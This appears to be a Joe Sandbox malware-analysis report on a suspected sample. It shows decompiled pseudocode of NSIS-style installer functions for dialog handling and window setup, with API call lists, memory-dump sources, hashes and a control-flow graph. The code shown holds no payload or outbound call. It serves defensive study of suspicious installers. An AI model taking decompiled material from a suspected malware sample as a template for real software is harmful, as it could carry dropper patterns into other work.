                                                                                                                        			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                                                        				struct HWND__* _v28;
                                                                                                                        				void* _v84;
                                                                                                                        				void* _v88;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				signed int _t34;
                                                                                                                        				signed int _t36;
                                                                                                                        				signed int _t38;
                                                                                                                        				struct HWND__* _t48;
                                                                                                                        				signed int _t67;
                                                                                                                        				struct HWND__* _t73;
                                                                                                                        				signed int _t86;
                                                                                                                        				struct HWND__* _t91;
                                                                                                                        				signed int _t99;
                                                                                                                        				int _t103;
                                                                                                                        				signed int _t117;
                                                                                                                        				int _t118;
                                                                                                                        				int _t122;
                                                                                                                        				signed int _t124;
                                                                                                                        				struct HWND__* _t127;
                                                                                                                        				struct HWND__* _t128;
                                                                                                                        				int _t129;
                                                                                                                        				intOrPtr _t130;
                                                                                                                        				long _t133;
                                                                                                                        				int _t135;
                                                                                                                        				int _t136;
                                                                                                                        				void* _t137;
                                                                                                                        				void* _t146;
                                                                                                                        
                                                                                                                        				_t130 = _a8;
                                                                                                                        				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                                                        					_t34 = _a12;
                                                                                                                        					_t127 = _a4;
                                                                                                                        					__eflags = _t130 - 0x110;
                                                                                                                        					 *0x42d250 = _t34;
                                                                                                                        					if(_t130 == 0x110) {
                                                                                                                        						 *0x434f08 = _t127;
                                                                                                                        						 *0x42d264 = GetDlgItem(_t127, 1);
                                                                                                                        						_t91 = GetDlgItem(_t127, 2);
                                                                                                                        						_push(0xffffffff);
                                                                                                                        						_push(0x1c);
                                                                                                                        						 *0x42b230 = _t91;
                                                                                                                        						E00404499(_t127);
                                                                                                                        						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
                                                                                                                        						 *0x433ecc = E0040140B(4);
                                                                                                                        						_t34 = 1;
                                                                                                                        						__eflags = 1;
                                                                                                                        						 *0x42d250 = 1;
                                                                                                                        					}
                                                                                                                        					_t124 =  *0x40a368; // 0x0
                                                                                                                        					_t136 = 0;
                                                                                                                        					_t133 = (_t124 << 6) +  *0x434f20;
                                                                                                                        					__eflags = _t124;
                                                                                                                        					if(_t124 < 0) {
                                                                                                                        						L36:
                                                                                                                        						E004044E5(0x40b);
                                                                                                                        						while(1) {
                                                                                                                        							_t36 =  *0x42d250;
                                                                                                                        							 *0x40a368 =  *0x40a368 + _t36;
                                                                                                                        							_t133 = _t133 + (_t36 << 6);
                                                                                                                        							_t38 =  *0x40a368; // 0x0
                                                                                                                        							__eflags = _t38 -  *0x434f24;
                                                                                                                        							if(_t38 ==  *0x434f24) {
                                                                                                                        								E0040140B(1);
                                                                                                                        							}
                                                                                                                        							__eflags =  *0x433ecc - _t136; // 0x0
                                                                                                                        							if(__eflags != 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							__eflags =  *0x40a368 -  *0x434f24; // 0x0
                                                                                                                        							if(__eflags >= 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t117 =  *(_t133 + 0x14);
                                                                                                                        							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                                                        							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                                                        							_push(0xfffffc19);
                                                                                                                        							E00404499(_t127);
                                                                                                                        							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                                                        							_push(0xfffffc1b);
                                                                                                                        							E00404499(_t127);
                                                                                                                        							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                                                        							_push(0xfffffc1a);
                                                                                                                        							E00404499(_t127);
                                                                                                                        							_t48 = GetDlgItem(_t127, 3);
                                                                                                                        							__eflags =  *0x434f8c - _t136;
                                                                                                                        							_v28 = _t48;
                                                                                                                        							if( *0x434f8c != _t136) {
                                                                                                                        								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                                                        								__eflags = _t117;
                                                                                                                        							}
                                                                                                                        							ShowWindow(_t48, _t117 & 0x00000008); // executed
                                                                                                                        							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
                                                                                                                        							E004044BB(_t117 & 0x00000002);
                                                                                                                        							_t118 = _t117 & 0x00000004;
                                                                                                                        							EnableWindow( *0x42b230, _t118);
                                                                                                                        							__eflags = _t118 - _t136;
                                                                                                                        							if(_t118 == _t136) {
                                                                                                                        								_push(1);
                                                                                                                        							} else {
                                                                                                                        								_push(_t136);
                                                                                                                        							}
                                                                                                                        							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                                                        							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                                                        							__eflags =  *0x434f8c - _t136;
                                                                                                                        							if( *0x434f8c == _t136) {
                                                                                                                        								_push( *0x42d264);
                                                                                                                        							} else {
                                                                                                                        								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                                                        								_push( *0x42b230);
                                                                                                                        							}
                                                                                                                        							E004044CE();
                                                                                                                        							E0040653D(0x42d268, E00403F7B());
                                                                                                                        							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                                                        							SetWindowTextW(_t127, 0x42d268); // executed
                                                                                                                        							_push(_t136);
                                                                                                                        							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                                                        							__eflags = _t67;
                                                                                                                        							if(_t67 != 0) {
                                                                                                                        								continue;
                                                                                                                        							} else {
                                                                                                                        								__eflags =  *_t133 - _t136;
                                                                                                                        								if( *_t133 == _t136) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								__eflags =  *(_t133 + 4) - 5;
                                                                                                                        								if( *(_t133 + 4) != 5) {
                                                                                                                        									DestroyWindow( *0x433ed8); // executed
                                                                                                                        									 *0x42c240 = _t133;
                                                                                                                        									__eflags =  *_t133 - _t136;
                                                                                                                        									if( *_t133 <= _t136) {
                                                                                                                        										goto L60;
                                                                                                                        									}
                                                                                                                        									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
                                                                                                                        									__eflags = _t73 - _t136;
                                                                                                                        									 *0x433ed8 = _t73;
                                                                                                                        									if(_t73 == _t136) {
                                                                                                                        										goto L60;
                                                                                                                        									}
                                                                                                                        									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                                                        									_push(6);
                                                                                                                        									E00404499(_t73);
                                                                                                                        									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                                                        									ScreenToClient(_t127, _t137 + 0x10);
                                                                                                                        									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                                                        									_push(_t136);
                                                                                                                        									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                                                        									__eflags =  *0x433ecc - _t136; // 0x0
                                                                                                                        									if(__eflags != 0) {
                                                                                                                        										goto L63;
                                                                                                                        									}
                                                                                                                        									ShowWindow( *0x433ed8, 8); // executed
                                                                                                                        									E004044E5(0x405);
                                                                                                                        									goto L60;
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x434f8c - _t136;
                                                                                                                        								if( *0x434f8c != _t136) {
                                                                                                                        									goto L63;
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x434f80 - _t136;
                                                                                                                        								if( *0x434f80 != _t136) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								goto L63;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						DestroyWindow( *0x433ed8);
                                                                                                                        						 *0x434f08 = _t136;
                                                                                                                        						EndDialog(_t127,  *0x42ba38);
                                                                                                                        						goto L60;
                                                                                                                        					} else {
                                                                                                                        						__eflags = _t34 - 1;
                                                                                                                        						if(_t34 != 1) {
                                                                                                                        							L35:
                                                                                                                        							__eflags =  *_t133 - _t136;
                                                                                                                        							if( *_t133 == _t136) {
                                                                                                                        								goto L63;
                                                                                                                        							}
                                                                                                                        							goto L36;
                                                                                                                        						}
                                                                                                                        						_push(0);
                                                                                                                        						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                                                        						__eflags = _t86;
                                                                                                                        						if(_t86 == 0) {
                                                                                                                        							goto L35;
                                                                                                                        						}
                                                                                                                        						SendMessageW( *0x433ed8, 0x40f, 0, 1);
                                                                                                                        						__eflags =  *0x433ecc - _t136; // 0x0
                                                                                                                        						return 0 | __eflags == 0x00000000;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t127 = _a4;
                                                                                                                        					_t136 = 0;
                                                                                                                        					if(_t130 == 0x47) {
                                                                                                                        						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
                                                                                                                        					}
                                                                                                                        					_t122 = _a12;
                                                                                                                        					if(_t130 != 5) {
                                                                                                                        						L8:
                                                                                                                        						if(_t130 != 0x40d) {
                                                                                                                        							__eflags = _t130 - 0x11;
                                                                                                                        							if(_t130 != 0x11) {
                                                                                                                        								__eflags = _t130 - 0x111;
                                                                                                                        								if(_t130 != 0x111) {
                                                                                                                        									L28:
                                                                                                                        									return E00404500(_a8, _t122, _a16);
                                                                                                                        								}
                                                                                                                        								_t135 = _t122 & 0x0000ffff;
                                                                                                                        								_t128 = GetDlgItem(_t127, _t135);
                                                                                                                        								__eflags = _t128 - _t136;
                                                                                                                        								if(_t128 == _t136) {
                                                                                                                        									L15:
                                                                                                                        									__eflags = _t135 - 1;
                                                                                                                        									if(_t135 != 1) {
                                                                                                                        										__eflags = _t135 - 3;
                                                                                                                        										if(_t135 != 3) {
                                                                                                                        											_t129 = 2;
                                                                                                                        											__eflags = _t135 - _t129;
                                                                                                                        											if(_t135 != _t129) {
                                                                                                                        												L27:
                                                                                                                        												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
                                                                                                                        												goto L28;
                                                                                                                        											}
                                                                                                                        											__eflags =  *0x434f8c - _t136;
                                                                                                                        											if( *0x434f8c == _t136) {
                                                                                                                        												_t99 = E0040140B(3);
                                                                                                                        												__eflags = _t99;
                                                                                                                        												if(_t99 != 0) {
                                                                                                                        													goto L28;
                                                                                                                        												}
                                                                                                                        												 *0x42ba38 = 1;
                                                                                                                        												L23:
                                                                                                                        												_push(0x78);
                                                                                                                        												L24:
                                                                                                                        												E00404472();
                                                                                                                        												goto L28;
                                                                                                                        											}
                                                                                                                        											E0040140B(_t129);
                                                                                                                        											 *0x42ba38 = _t129;
                                                                                                                        											goto L23;
                                                                                                                        										}
                                                                                                                        										__eflags =  *0x40a368 - _t136; // 0x0
                                                                                                                        										if(__eflags <= 0) {
                                                                                                                        											goto L27;
                                                                                                                        										}
                                                                                                                        										_push(0xffffffff);
                                                                                                                        										goto L24;
                                                                                                                        									}
                                                                                                                        									_push(_t135);
                                                                                                                        									goto L24;
                                                                                                                        								}
                                                                                                                        								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                                                        								_t103 = IsWindowEnabled(_t128);
                                                                                                                        								__eflags = _t103;
                                                                                                                        								if(_t103 == 0) {
                                                                                                                        									L63:
                                                                                                                        									return 0;
                                                                                                                        								}
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        							SetWindowLongW(_t127, _t136, _t136);
                                                                                                                        							return 1;
                                                                                                                        						}
                                                                                                                        						DestroyWindow( *0x433ed8);
                                                                                                                        						 *0x433ed8 = _t122;
                                                                                                                        						L60:
                                                                                                                        						if( *0x42f268 == _t136) {
                                                                                                                        							_t146 =  *0x433ed8 - _t136; // 0x10418
                                                                                                                        							if(_t146 != 0) {
                                                                                                                        								ShowWindow(_t127, 0xa); // executed
                                                                                                                        								 *0x42f268 = 1;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L63;
                                                                                                                        					}
                                                                                                                        					asm("sbb eax, eax");
                                                                                                                        					ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
                                                                                                                        					if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                                                        						goto L28;
                                                                                                                        					} else {
                                                                                                                        						ShowWindow(_t127, 4);
                                                                                                                        						goto L8;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
































                                                                                                                        0x00404100
                                                                                                                        0x00000000
                                                                                                                        0x00404109
                                                                                                                        0x00404068
                                                                                                                        0x00404073
                                                                                                                        0x00404075
                                                                                                                        0x00404077
                                                                                                                        0x00404096
                                                                                                                        0x00404096
                                                                                                                        0x00404099
                                                                                                                        0x0040409e
                                                                                                                        0x004040a1
                                                                                                                        0x004040b1
                                                                                                                        0x004040b2
                                                                                                                        0x004040b4
                                                                                                                        0x004040ea
                                                                                                                        0x004040fa
                                                                                                                        0x00000000
                                                                                                                        0x004040fa
                                                                                                                        0x004040b6
                                                                                                                        0x004040bc
                                                                                                                        0x004040d5
                                                                                                                        0x004040da
                                                                                                                        0x004040dc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004040de
                                                                                                                        0x004040ca
                                                                                                                        0x004040ca
                                                                                                                        0x004040cc
                                                                                                                        0x004040cc
                                                                                                                        0x00000000
                                                                                                                        0x004040cc
                                                                                                                        0x004040bf
                                                                                                                        0x004040c4
                                                                                                                        0x00000000
                                                                                                                        0x004040c4
                                                                                                                        0x004040a3
                                                                                                                        0x004040a9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004040ab
                                                                                                                        0x00000000
                                                                                                                        0x004040ab
                                                                                                                        0x0040409b
                                                                                                                        0x00000000
                                                                                                                        0x0040409b
                                                                                                                        0x00404081
                                                                                                                        0x00404088
                                                                                                                        0x0040408e
                                                                                                                        0x00404090
                                                                                                                        0x00404466
                                                                                                                        0x00000000
                                                                                                                        0x00404466
                                                                                                                        0x00000000
                                                                                                                        0x00404090
                                                                                                                        0x0040404e
                                                                                                                        0x00000000
                                                                                                                        0x00404056
                                                                                                                        0x00404035
                                                                                                                        0x0040403b
                                                                                                                        0x00404443
                                                                                                                        0x00404449
                                                                                                                        0x0040444b
                                                                                                                        0x00404451
                                                                                                                        0x00404456
                                                                                                                        0x0040445c
                                                                                                                        0x0040445c
                                                                                                                        0x00404451
                                                                                                                        0x00000000
                                                                                                                        0x00404449
                                                                                                                        0x00403fea
                                                                                                                        0x00403ff6
                                                                                                                        0x00403fff
                                                                                                                        0x00000000
                                                                                                                        0x0040401e
                                                                                                                        0x00404021
                                                                                                                        0x00000000
                                                                                                                        0x00404021
                                                                                                                        0x00403fff

                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                        • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                        • DestroyWindow.USER32 ref: 00404035
                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                        • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                        • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                        • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102670554.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102703550.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102744670.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102832788.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 121052019-0
                                                                                                                        • Opcode ID: e7f11a10533a611f3fe78e549378f399a66bd747c21cf404ab37e5123baac86e
                                                                                                                        • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                        • Opcode Fuzzy Hash: e7f11a10533a611f3fe78e549378f399a66bd747c21cf404ab37e5123baac86e
                                                                                                                        • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 312 403c72-403c9b call 403ec2 call 405f14 304->312 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->312 319 403ca1-403ca6 312->319 320 403d2d-403d35 call 405f14 312->320 319->320 321 403cac-403cd4 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 321->320 328 403cd6-403cda 321->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 333 403cec-403cf8 lstrlenW 328->333 334 403cdc-403ce9 call 405e39 328->334 342 403df3-403df6 330->342 343 403dfb-403e06 call 403ec2 330->343 335 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->335 336 403eb8 331->336 340 403d20-403d28 call 405e0c call 40653d 333->340 341 403cfa-403d08 lstrcmpiW 333->341 334->333 335->330 339 403eba-403ec1 336->339 340->320 341->340 346 403d0a-403d14 GetFileAttributesW 341->346 342->339 354 403e0c-403e26 ShowWindow call 40689a 343->354 355 403e8f-403e90 call 405672 343->355 347 403d16-403d18 346->347 348 403d1a-403d1b call 405e58 346->348 347->340 347->348 348->340 362 403e32-403e44 GetClassInfoW 354->362 363 403e28-403e2d call 40689a 354->363 358 403e95-403e97 355->358 360 403eb1-403eb3 call 40140b 358->360 361 403e99-403e9f 358->361 360->336 361->342 364 403ea5-403eac call 40140b 361->364 367 403e46-403e56 GetClassInfoW RegisterClassW 362->367 368 403e5c-403e7f DialogBoxParamW call 40140b 362->368 363->362 364->342 367->368 372 403e84-403e8d call 403b3c 368->372 372->339
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E00403BEC(void* __eflags) {
                                                                                                                        				intOrPtr _v4;
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				int _v12;
                                                                                                                        				void _v16;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				intOrPtr* _t22;
                                                                                                                        				void* _t30;
                                                                                                                        				void* _t32;
                                                                                                                        				int _t33;
                                                                                                                        				void* _t36;
                                                                                                                        				int _t39;
                                                                                                                        				int _t40;
                                                                                                                        				intOrPtr _t41;
                                                                                                                        				int _t44;
                                                                                                                        				short _t63;
                                                                                                                        				WCHAR* _t65;
                                                                                                                        				signed char _t69;
                                                                                                                        				WCHAR* _t76;
                                                                                                                        				intOrPtr _t82;
                                                                                                                        				WCHAR* _t87;
                                                                                                                        
                                                                                                                        				_t82 =  *0x434f10;
                                                                                                                        				_t22 = E0040690A(2);
                                                                                                                        				_t90 = _t22;
                                                                                                                        				if(_t22 == 0) {
                                                                                                                        					_t76 = 0x42d268;
                                                                                                                        					L"1033" = 0x30;
                                                                                                                        					 *0x442002 = 0x78;
                                                                                                                        					 *0x442004 = 0;
                                                                                                                        					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
                                                                                                                        					__eflags =  *0x42d268;
                                                                                                                        					if(__eflags == 0) {
                                                                                                                        						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
                                                                                                                        					}
                                                                                                                        					lstrcatW(L"1033", _t76);
                                                                                                                        				} else {
                                                                                                                        					E00406484(L"1033",  *_t22() & 0x0000ffff);
                                                                                                                        				}
                                                                                                                        				E00403EC2(_t78, _t90);
                                                                                                                        				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne";
                                                                                                                        				 *0x434f80 =  *0x434f18 & 0x00000020;
                                                                                                                        				 *0x434f9c = 0x10000;
                                                                                                                        				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Folketingsvalget160\\Tatou\\Borgerdyderne") != 0) {
                                                                                                                        					L16:
                                                                                                                        					if(E00405F14(_t98, _t86) == 0) {
                                                                                                                        						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
                                                                                                                        					}
                                                                                                                        					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                                                        					 *0x433ee8 = _t30;
                                                                                                                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                                                                                        						L21:
                                                                                                                        						if(E0040140B(0) == 0) {
                                                                                                                        							_t32 = E00403EC2(_t78, __eflags);
                                                                                                                        							__eflags =  *0x434fa0;
                                                                                                                        							if( *0x434fa0 != 0) {
                                                                                                                        								_t33 = E00405672(_t32, 0);
                                                                                                                        								__eflags = _t33;
                                                                                                                        								if(_t33 == 0) {
                                                                                                                        									E0040140B(1);
                                                                                                                        									goto L33;
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x433ecc; // 0x0
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									E0040140B(2);
                                                                                                                        								}
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        							ShowWindow( *0x42d248, 5); // executed
                                                                                                                        							_t39 = E0040689A("RichEd20"); // executed
                                                                                                                        							__eflags = _t39;
                                                                                                                        							if(_t39 == 0) {
                                                                                                                        								E0040689A("RichEd32");
                                                                                                                        							}
                                                                                                                        							_t87 = L"RichEdit20W";
                                                                                                                        							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
                                                                                                                        							__eflags = _t40;
                                                                                                                        							if(_t40 == 0) {
                                                                                                                        								GetClassInfoW(0, L"RichEdit", 0x433ea0);
                                                                                                                        								 *0x433ec4 = _t87;
                                                                                                                        								RegisterClassW(0x433ea0);
                                                                                                                        							}
                                                                                                                        							_t41 =  *0x433ee0; // 0x0
                                                                                                                        							_t44 = DialogBoxParamW( *0x434f00, _t41 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
                                                                                                                        							E00403B3C(E0040140B(5), 1);
                                                                                                                        							return _t44;
                                                                                                                        						}
                                                                                                                        						L22:
                                                                                                                        						_t36 = 2;
                                                                                                                        						return _t36;
                                                                                                                        					} else {
                                                                                                                        						_t78 =  *0x434f00;
                                                                                                                        						 *0x433ea4 = E00401000;
                                                                                                                        						 *0x433eb0 =  *0x434f00;
                                                                                                                        						 *0x433eb4 = _t30;
                                                                                                                        						 *0x433ec4 = 0x40a380;
                                                                                                                        						if(RegisterClassW(0x433ea0) == 0) {
                                                                                                                        							L33:
                                                                                                                        							__eflags = 0;
                                                                                                                        							return 0;
                                                                                                                        						}
                                                                                                                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                                                                                                                        						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
                                                                                                                        						goto L21;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t78 =  *(_t82 + 0x48);
                                                                                                                        					_t92 = _t78;
                                                                                                                        					if(_t78 == 0) {
                                                                                                                        						goto L16;
                                                                                                                        					}
                                                                                                                        					_t76 = 0x432ea0;
                                                                                                                        					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
                                                                                                                        					_t63 =  *0x432ea0; // 0x43
                                                                                                                        					if(_t63 == 0) {
                                                                                                                        						goto L16;
                                                                                                                        					}
                                                                                                                        					if(_t63 == 0x22) {
                                                                                                                        						_t76 = 0x432ea2;
                                                                                                                        						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
                                                                                                                        					}
                                                                                                                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                                                                                                                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                                                                                                                        						L15:
                                                                                                                        						E0040653D(_t86, E00405E0C(_t76));
                                                                                                                        						goto L16;
                                                                                                                        					} else {
                                                                                                                        						_t69 = GetFileAttributesW(_t76);
                                                                                                                        						if(_t69 == 0xffffffff) {
                                                                                                                        							L14:
                                                                                                                        							E00405E58(_t76);
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						_t98 = _t69 & 0x00000010;
                                                                                                                        						if((_t69 & 0x00000010) != 0) {
                                                                                                                        							goto L15;
                                                                                                                        						}
                                                                                                                        						goto L14;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}


























                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                          • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                        • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                        • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75AF3420), ref: 00403CED
                                                                                                                        • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                        • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne), ref: 00403D54
                                                                                                                          • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                        • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                        • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                        • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1102357506.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1102319549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102430463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1102479646.000000000040A000.00000004.00000001.01000000.00000003.sdmp
